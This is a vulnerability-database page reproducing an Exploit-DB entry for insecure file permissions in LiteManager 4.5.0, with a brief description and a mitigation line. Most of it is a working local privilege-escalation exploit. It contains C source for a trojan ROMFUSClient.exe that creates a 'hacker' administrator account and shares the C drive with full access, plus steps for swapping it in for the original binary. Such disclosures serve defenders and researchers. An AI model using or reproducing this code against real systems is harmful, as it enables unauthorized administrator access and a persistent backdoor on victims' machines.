header-logo
Suggest Exploit
vendor:
LiteManager
by:
ZwX
7.5
CVSS
HIGH
Insecure File Permissions
275
CWE
Product Name: LiteManager
Affected Version From: LiteManager 4.5.0
Affected Version To: LiteManager 4.5.0
Patch Exists: NO
Related CWE:
CPE: LiteManager 4.5.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2019

LiteManager 4.5.0 – Insecure File Permissions

The LiteManager 4.5.0 software has insecure file permissions that allow an attacker to escalate privileges on the system. By replacing the legitimate ROMFUSClient.exe file with a malicious one, an attacker can execute arbitrary code with elevated privileges. This exploit code adds a new user, adds the user to the Administrators group, and grants full access to the C drive. When a more privileged user connects and uses the ROMFUSClient IDE, the privilege escalation is successful.

Mitigation:

Apply the vendor-supplied patch or update to the latest version of the software. Ensure that file permissions are properly set to prevent unauthorized modification.
Source

Exploit-DB raw data:

# Exploit Title: LiteManager 4.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-21
# Vendor Homepage : LiteManager Team
# Software Link: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
# Tested on OS: Windows 7 


# Proof of Concept (PoC):
==========================


C:\Program Files\LiteManagerFree - Server>icacls *.exe
ROMFUSClient.exe Everyone:(F)
                 AUTORITE NT\Système:(I)(F)
                 BUILTIN\Administrateurs:(I)(F)
                 BUILTIN\Utilisateurs:(I)(RX)
				 
				 
#Exploit code(s): 
=================

1) Compile below 'C' code name it as "ROMFUSClient.exe"

#include<windows.h>

int main(void){
 system("net user hacker abc123 /add");
 system("net localgroup Administrators hacker  /add");
 system("net share SHARE_NAME=c:\ /grant:hacker,full");
 WinExec("C:\\Program Files\\LiteManagerFree\\~ROMFUSClient.exe",0);
return 0;
} 

2) Rename original "ROMFUSClient.exe" to "~ROMFUSClient.exe"
3) Place our malicious "ROMFUSClient.exe" in the LiteManagerFree directory
4) Disconnect and wait for a more privileged user to connect and use ROMFUSClient IDE. 
Privilege Successful Escalation

Navigation

Suggest Exploit

Services By CQR